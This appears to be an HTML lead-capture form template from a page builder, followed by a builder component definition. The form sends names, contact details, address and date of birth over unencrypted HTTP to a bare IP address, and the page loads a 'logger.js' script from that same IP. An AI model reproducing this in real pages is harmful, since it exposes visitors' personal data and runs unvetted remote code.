<style>

</style>
<form id="lead-generation-form" class="clearfix" action="http://34.217.146.254/lead-post-api" method="POST">
    <input type="hidden" name="unique_code" value="[UNIQUE_CODE]">
    <input type="hidden" id="project_ref" name="project_ref" value="[PROJECT_REF]">
    <input type="hidden" id="page_ref" name="page_ref" value="[PAGE_REF]">
    <input type="hidden" id="form_ref" name="form_ref" value="[FORM_REF]">
    <div class="form-group col-sm-12">
        <label class="control-label" for="title">Title <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="title" id="title" placeholder="Enter Title" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="first_name">First Name <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="first_name" id="first_name" placeholder="Enter First Name" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="last_name">Last Name <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="last_name" id="last_name" placeholder="Enter Last Name" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="email">Email <small class="text-danger">*</small></label>
        <input type="email" class="form-control" name="email" id="email" placeholder="Enter Email" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="phone">Phone <small class="text-danger">*</small></label>
        <input type="tel" class="form-control" name="phone" id="phone" placeholder="Enter Phone" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="fax">Fax <small class="text-danger">*</small></label>
        <input type="tel" class="form-control" name="fax" id="fax" placeholder="Enter Fax" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="zip">Zip <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="zip" id="zip" placeholder="Enter Zip" required/>
    </div>
    <div class="form-group col-sm-12">
        <label class="control-label" for="address">Address <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="address" id="address" placeholder="Enter Address" required/>
    </div>
    <div class="col-sm-12 form-group">
        <label class="control-label" for="city">City/Town <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="city" id="city" placeholder="Enter City" required/>
    </div>
    <div class="col-sm-12 form-group">
        <label class="control-label" for="company">Company <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="company" id="company" placeholder="Enter Company" required/>
    </div>
    <div class="col-sm-12 form-group">
        <label class="control-label" for="designation">Designation <small class="text-danger">*</small></label>
        <input type="text" class="form-control" name="designation" id="designation" placeholder="Enter Designation" required/>
    </div>
    <div class="col-sm-12 form-group">
        <label class="control-label">DOB<small class="text-danger">*</small></label>
        <div class="row">
            <div class="col-sm-4">
                <select class="form-control" name="dob_day" id="dob_day" required>
                    <option value="" disabled="" selected="" hidden="">Birth Day</option>
                    <option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option>
                </select>
            </div>
            <div class="col-sm-4">
                <select class="form-control" name="dob_month" id="dob_month" required>
                    <option value="" disabled="" selected="" hidden="">Birth Month</option><option value="01">January</option><option value="02">February</option><option value="03">March</option><option value="04">April</option><option value="05">May</option><option value="06">June</option><option value="07">July</option><option value="08">August</option><option value="09">September</option><option value="10">October</option><option value="11">November</option><option value="12">December</option>
                </select>
            </div>
            <div class="col-sm-4">
                <select class="form-control" name="dob_year" id="dob_year" required>
                    <option value="" disabled="" selected="" hidden="">Birth Year</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option>
                </select>
            </div>
        </div>
    </div>
    <div class="form-group">
        <button type="submit" class="btn btn-success" id="submit" name="submit" >Submit</button> 
    </div>
</form>
<script src="http://34.217.146.254/logger.js"></script>
<script>
    ({
        name: 'form',
        nodes: ['form'],
        frameworks: ['bootstrap'],
        types: ['flow'],
        validChildren: ['flow'],
        category: 'forms',
        icon: 'form-custom',
        attributes: {
            type: {
                list: [
                    {name: 'Basic', value: 'default'},
                    {name: 'Horizontal', value: 'form-horizonal'},
                    {name: 'Inline', value: 'form-inline'},
                ],
                value: 'default',
                onAssign: function (livePreview) {
                    for (var i = this.list.length - 1; i >= 0; i--) {
                        if (livePreview.selected.node.className.indexOf(this.list[i].value) > -1) {
                            return this.value = this.list[i].value;
                        }
                    }
                },
                onChange: function (livePreview, type) {

                    //strip any previously assigned type classes from the icon
                    for (var i = this.list.length - 1; i >= 0; i--) {
                        livePreview.selected.node.classList.remove(this.list[i].value);
                    }
                    ;

                    livePreview.selected.node.classList.add(type);
                }
            }
        },
        description: 'A form to contain form elements.',
    });
</script>
